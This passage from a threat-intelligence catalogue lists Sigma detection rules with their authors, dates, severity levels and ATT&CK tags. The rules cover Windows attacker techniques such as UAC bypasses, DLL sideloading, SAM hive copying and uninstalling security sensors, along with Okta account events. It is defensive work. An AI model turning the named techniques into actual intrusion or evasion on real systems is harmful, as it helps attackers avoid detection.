author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/18
falsepositive ['Likelihood is related to how often the paths are used in the environment']
filename proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Suspicious Extrac32 Execution

Download or Copy file with Extrac32

Internal MISP references

UUID aa8e035d-7be4-48d3-a944-102aec04400d which can be used as unique global reference for Suspicious Extrac32 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_extrac32.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential RDP Session Hijacking Activity

Detects potential RDP Session Hijacking activity on Windows systems

Internal MISP references

UUID 224f140f-3553-4cd1-af78-13d81bf9f7cc which can be used as unique global reference for Potential RDP Session Hijacking Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @juju4
creation_date 2022/12/27
falsepositive ['Administrative activity']
filename proc_creation_win_tscon_rdp_session_hijacking.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Nslookup PowerShell Download Cradle - ProcessCreation

Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records

Internal MISP references

UUID 1b3b01c7-84e9-4072-86e5-fc285a41ff23 which can be used as unique global reference for Nslookup PowerShell Download Cradle - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/05
falsepositive ['Unknown']
filename proc_creation_win_nslookup_poweshell_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Msbuild Execution By Uncommon Parent Process

Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process

Internal MISP references

UUID 33be4333-2c6b-44f4-ae28-102cdbde0a31 which can be used as unique global reference for Suspicious Msbuild Execution By Uncommon Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/11/17
falsepositive ['Unknown']
filename proc_creation_win_msbuild_susp_parent_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Rar Usage with Password and Compression Level

Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.

Internal MISP references

UUID faa48cae-6b25-4f00-a094-08947fef582f which can be used as unique global reference for Rar Usage with Password and Compression Level in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ROxPinTeddy
creation_date 2020/05/12
falsepositive ['Legitimate use of Winrar command line version', 'Other command line tools, that use these flags']
filename proc_creation_win_rar_compression_with_password.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious EventLog Recon Activity Using Log Query Utilities

Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.

Internal MISP references

UUID beaa66d6-aa1b-4e3c-80f5-e0145369bfaf which can be used as unique global reference for Potentially Suspicious EventLog Recon Activity Using Log Query Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Legitimate usage of the utility by administrators to query the event log']
filename proc_creation_win_susp_eventlog_content_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.discovery', 'attack.t1552']
Related clusters

To see the related clusters, click here.

Renamed Office Binary Execution

Detects the execution of a renamed office binary

Internal MISP references

UUID 0b0cd537-fc77-4e6e-a973-e53495c1083d which can be used as unique global reference for Renamed Office Binary Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/20
falsepositive ['Unknown']
filename proc_creation_win_renamed_office_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Advpack Call Via Rundll32.EXE

Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function

Internal MISP references

UUID a1473adb-5338-4a20-b4c3-126763e2d3d3 which can be used as unique global reference for Suspicious Advpack Call Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/17
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

TrustedPath UAC Bypass Pattern

Detects indicators of a UAC bypass method by mocking directories

Internal MISP references

UUID 4ac47ed3-44c2-4b1f-9d51-bf46e8914126 which can be used as unique global reference for TrustedPath UAC Bypass Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/27
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_trustedpath.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

Internal MISP references

UUID f63b56ee-3f79-4b8a-97fb-5c48007e8573 which can be used as unique global reference for New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/08
falsepositive ['Unknown']
filename proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002', 'attack.t1112']
Related clusters

To see the related clusters, click here.

File Download Using Notepad++ GUP Utility

Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.

Internal MISP references

UUID 44143844-0631-49ab-97a0-96387d6b2d7c which can be used as unique global reference for File Download Using Notepad++ GUP Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/10
falsepositive ['Other parent processes other than notepad++ using GUP that are not currently identified']
filename proc_creation_win_gup_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

PowerShell SAM Copy

Detects suspicious PowerShell scripts accessing SAM hives

Internal MISP references

UUID 1af57a4b-460a-4738-9034-db68b880c665 which can be used as unique global reference for PowerShell SAM Copy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/29
falsepositive ['Some rare backup scenarios', 'PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs']
filename proc_creation_win_powershell_sam_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

HackTool - Certify Execution

Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.

Internal MISP references

UUID 762f2482-ff21-4970-8939-0aa317a886bb which can be used as unique global reference for HackTool - Certify Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unknown']
filename proc_creation_win_hktl_certify.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

UAC Bypass Using NTFS Reparse Point - Process

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

Internal MISP references

UUID 39ed3c80-e6a1-431b-9df3-911ac53d08a7 which can be used as unique global reference for UAC Bypass Using NTFS Reparse Point - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_ntfs_reparse_point.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Renamed ProcDump Execution

Detects the execution of a renamed ProcDump executable often used by attackers or malware

Internal MISP references

UUID 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 which can be used as unique global reference for Renamed ProcDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/11/18
falsepositive ['Procdump illegaly bundled with legitimate software', 'Administrators who rename binaries (should be investigated)']
filename proc_creation_win_renamed_sysinternals_procdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location

Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.

Internal MISP references

UUID b2b048b0-7857-4380-b0fb-d3f0ab820b71 which can be used as unique global reference for Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/05
falsepositive ['Administrators building packages using iexpress.exe']
filename proc_creation_win_iexpress_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - Nimgrab Execution

Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.

Internal MISP references

UUID 74a12f18-505c-4114-8d0b-8448dd5485c6 which can be used as unique global reference for PUA - Nimgrab Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/28
falsepositive ['Legitimate use of Nim on a developer systems']
filename proc_creation_win_pua_nimgrab.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Application Whitelisting Bypass via Dxcap.exe

Detects execution of of Dxcap.exe

Internal MISP references

UUID 60f16a96-db70-42eb-8f76-16763e333590 which can be used as unique global reference for Application Whitelisting Bypass via Dxcap.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/26
falsepositive ['Legitimate execution of dxcap.exe by legitimate user']
filename proc_creation_win_lolbin_susp_dxcap.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Mpclient.DLL Sideloading Via Defender Binaries

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

Internal MISP references

UUID 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 which can be used as unique global reference for Potential Mpclient.DLL Sideloading Via Defender Binaries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/08/01
falsepositive ['Unlikely']
filename proc_creation_win_mpcmdrun_dll_sideload_defender.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Xwizard DLL Sideloading

Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll

Internal MISP references

UUID 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1 which can be used as unique global reference for Xwizard DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/09/20
falsepositive ['Windows installed on non-C drive']
filename proc_creation_win_lolbin_dll_sideload_xwizard.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Renamed CURL.EXE Execution

Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields

Internal MISP references

UUID 7530cd3d-7671-43e3-b209-976966f6ea48 which can be used as unique global reference for Renamed CURL.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/09/11
falsepositive ['Unknown']
filename proc_creation_win_renamed_curl.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

RestrictedAdminMode Registry Value Tampering - ProcCreation

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise

Internal MISP references

UUID 28ac00d6-22d9-4a3c-927f-bbd770104573 which can be used as unique global reference for RestrictedAdminMode Registry Value Tampering - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/13
falsepositive ['Unknown']
filename proc_creation_win_reg_lsa_disable_restricted_admin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Service StartupType Change Via PowerShell Set-Service

Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"

Internal MISP references

UUID 62b20d44-1546-4e61-afce-8e175eb9473c which can be used as unique global reference for Service StartupType Change Via PowerShell Set-Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/04
falsepositive ['False positives may occur with troubleshooting scripts']
filename proc_creation_win_powershell_set_service_disabled.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Uninstall Crowdstrike Falcon Sensor

Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon

Internal MISP references

UUID f0f7be61-9cf5-43be-9836-99d6ef448a18 which can be used as unique global reference for Uninstall Crowdstrike Falcon Sensor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/12
falsepositive ['Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated']
filename proc_creation_win_uninstall_crowdstrike_falcon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Discovery of a System Time

Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.

Internal MISP references

UUID b243b280-65fe-48df-ba07-6ddea7646427 which can be used as unique global reference for Discovery of a System Time in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate use of the system utilities to discover system time for legitimate reason']
filename proc_creation_win_remote_time_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1124']
Related clusters

To see the related clusters, click here.

Remote Access Tool - RURAT Execution From Unusual Location

Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')

Internal MISP references

UUID e01fa958-6893-41d4-ae03-182477c5e77d which can be used as unique global reference for Remote Access Tool - RURAT Execution From Unusual Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/19
falsepositive ['Unknown']
filename proc_creation_win_remote_access_tools_rurat_non_default_location.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Remote Access Tool - AnyDesk Silent Installation

Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.

Internal MISP references

UUID 114e7f1c-f137-48c8-8f54-3088c24ce4b9 which can be used as unique global reference for Remote Access Tool - AnyDesk Silent Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský
creation_date 2021/08/06
falsepositive ['Legitimate deployment of AnyDesk']
filename proc_creation_win_remote_access_tools_anydesk_silent_install.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

HackTool - PowerTool Execution

Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files

Internal MISP references

UUID a34f79a3-8e5f-4cc3-b765-de00695452c2 which can be used as unique global reference for HackTool - PowerTool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/29
falsepositive ['Unlikely']
filename proc_creation_win_hktl_powertool.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious Control Panel DLL Load

Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits

Internal MISP references

UUID d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 which can be used as unique global reference for Suspicious Control Panel DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/04/15
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_control_dll_load.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Renamed PingCastle Binary Execution

Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.

Internal MISP references

UUID 2433a154-bb3d-42e4-86c3-a26bdac91c45 which can be used as unique global reference for Renamed PingCastle Binary Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2024/01/11
falsepositive ['Unknown']
filename proc_creation_win_renamed_pingcastle.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential Provlaunch.EXE Binary Proxy Execution Abuse

Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

Internal MISP references

UUID 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c which can be used as unique global reference for Potential Provlaunch.EXE Binary Proxy Execution Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023/08/08
falsepositive ['Unknown']
filename proc_creation_win_provlaunch_potential_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Antivirus Password Dumper Detection

Detects a highly relevant Antivirus alert that reports a password dumper

Internal MISP references

UUID 78cc2dd2-7d20-4d32-93ff-057084c38b93 which can be used as unique global reference for Antivirus Password Dumper Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/09/09
falsepositive ['Unlikely']
filename av_password_dumper.yml
level critical
logsource.category antivirus
logsource.product No established product
tags ['attack.credential_access', 'attack.t1003', 'attack.t1558', 'attack.t1003.001', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Antivirus Relevant File Paths Alerts

Detects an Antivirus alert in a highly relevant file path or with a relevant file name

Internal MISP references

UUID c9a88268-0047-4824-ba6e-4d81ce0b907c which can be used as unique global reference for Antivirus Relevant File Paths Alerts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2018/09/09
falsepositive ['Unlikely']
filename av_relevant_files.yml
level high
logsource.category antivirus
logsource.product No established product
tags ['attack.resource_development', 'attack.t1588']
Related clusters

To see the related clusters, click here.

Antivirus Exploitation Framework Detection

Detects a highly relevant Antivirus alert that reports an exploitation framework

Internal MISP references

UUID 238527ad-3c2c-4e4f-a1f6-92fd63adb864 which can be used as unique global reference for Antivirus Exploitation Framework Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2018/09/09
falsepositive ['Unlikely']
filename av_exploiting.yml
level critical
logsource.category antivirus
logsource.product No established product
tags ['attack.execution', 'attack.t1203', 'attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Antivirus Hacktool Detection

Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool

Internal MISP references

UUID fa0c05b6-8ad3-468d-8231-c1cbccb64fba which can be used as unique global reference for Antivirus Hacktool Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2021/08/16
falsepositive ['Unlikely']
filename av_hacktool.yml
level high
logsource.category antivirus
logsource.product No established product
tags ['attack.execution', 'attack.t1204']
Related clusters

To see the related clusters, click here.

Antivirus Web Shell Detection

Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.

Internal MISP references

UUID fdf135a2-9241-4f96-a114-bb404948f736 which can be used as unique global reference for Antivirus Web Shell Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2018/09/09
falsepositive ['Unlikely']
filename av_webshell.yml
level high
logsource.category antivirus
logsource.product No established product
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Antivirus Ransomware Detection

Detects a highly relevant Antivirus alert that reports ransomware

Internal MISP references

UUID 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f which can be used as unique global reference for Antivirus Ransomware Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2022/05/12
falsepositive ['Unlikely']
filename av_ransomware.yml
level critical
logsource.category antivirus
logsource.product No established product
tags ['attack.t1486']
Related clusters

To see the related clusters, click here.

Suspicious SQL Query

Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields

Internal MISP references

UUID d84c0ded-edd7-4123-80ed-348bb3ccc4d5 which can be used as unique global reference for Suspicious SQL Query in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @juju4
creation_date 2022/12/27
falsepositive ['Inventory and monitoring activity', 'Vulnerability scanners', 'Legitimate applications']
filename db_anomalous_query.yml
level medium
logsource.category database
logsource.product No established product
tags ['attack.exfiltration', 'attack.initial_access', 'attack.privilege_escalation', 'attack.t1190', 'attack.t1505.001']
Related clusters

To see the related clusters, click here.

Okta FastPass Phishing Detection

Detects when Okta FastPass prevents a known phishing site.

Internal MISP references

UUID ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e which can be used as unique global reference for Okta FastPass Phishing Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2023/05/07
falsepositive ['Unlikely']
filename okta_fastpass_phishing_detection.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.initial_access', 'attack.t1566']
Related clusters

To see the related clusters, click here.

Okta Security Threat Detected

Detects when an security threat is detected in Okta.

Internal MISP references

UUID 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 which can be used as unique global reference for Okta Security Threat Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_security_threat_detected.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.command_and_control']

Okta New Admin Console Behaviours

Detects when Okta identifies new activity in the Admin Console.

Internal MISP references

UUID a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9 which can be used as unique global reference for Okta New Admin Console Behaviours in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/09/07
falsepositive ['Whenever an admin starts using new features of the admin console.']
filename okta_new_behaviours_admin_console.yml
level low
logsource.category No established category
logsource.product okta
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Okta Suspicious Activity Reported by End-user

Detects when an Okta end-user reports activity by their account as being potentially suspicious.

Internal MISP references

UUID 07e97cc6-aed1-43ae-9081-b3470d2367f1 which can be used as unique global reference for Okta Suspicious Activity Reported by End-user in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/09/07
falsepositive ['If an end-user incorrectly identifies normal activity as suspicious.']
filename okta_suspicious_activity_enduser_report.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.resource_development', 'attack.t1586.003']
Related clusters

To see the related clusters, click here.

Okta User Account Locked Out

Detects when an user account is locked out.

Internal MISP references

UUID 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a which can be used as unique global reference for Okta User Account Locked Out in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_user_account_locked_out.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Okta Identity Provider Created

Detects when a new identity provider is created for Okta.

Internal MISP references

UUID 969c7590-8c19-4797-8c1b-23155de6e7ac which can be used as unique global reference for Okta Identity Provider Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/09/07
falsepositive ['When an admin creates a new, authorised identity provider.']
filename okta_identity_provider_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence', 'attack.t1098.001']
Related clusters

To see the related clusters, click here.

Okta API Token Revoked

Detects when a API Token is revoked.

Internal MISP references

UUID cf1dbc6b-6205-41b4-9b88-a83980d2255b which can be used as unique global reference for Okta API Token Revoked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_api_token_revoked.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Policy Rule Modified or Deleted

Detects when an Policy Rule is Modified or Deleted.

Internal MISP references

UUID 0c97c1d3-4057-45c9-b148-1de94b631931 which can be used as unique global reference for Okta Policy Rule Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_policy_rule_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Unauthorized Access to App

Detects when unauthorized access to app occurs.

Internal MISP references

UUID 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 which can be used as unique global reference for Okta Unauthorized Access to App in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['User might of believe that they had access.']
filename okta_unauthorized_access_to_app.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Application Sign-On Policy Modified or Deleted

Detects when an application Sign-on Policy is modified or deleted.

Internal MISP references

UUID 8f668cc4-c18e-45fe-ad00-624a981cf88a which can be used as unique global reference for Okta Application Sign-On Policy Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_application_sign_on_policy_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Admin Role Assignment Created

Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence

Internal MISP references

UUID 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c which can be used as unique global reference for Okta Admin Role Assignment Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Khalimonenkov
creation_date 2023/01/19
falsepositive ['Legitimate creation of a new admin role assignment']
filename okta_admin_role_assignment_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence']

Okta Admin Role Assigned to an User or Group

Detects when an the Administrator role is assigned to an user or group.

Internal MISP references

UUID 413d4a81-6c98-4479-9863-014785fd579c which can be used as unique global reference for Okta Admin Role Assigned to an User or Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Administrator roles could be assigned to users or group by other admin users.']
filename okta_admin_role_assigned_to_user_or_group.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

New Okta User Created

Detects new user account creation

Internal MISP references

UUID b6c718dd-8f53-4b9f-98d8-93fdca966969 which can be used as unique global reference for New Okta User Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Legitimate and authorized user creation']
filename okta_user_created.yml
level informational
logsource.category No established category
logsource.product okta
tags ['attack.credential_access']

Okta Application Modified or Deleted

Detects when an application is modified or deleted.

Internal MISP references

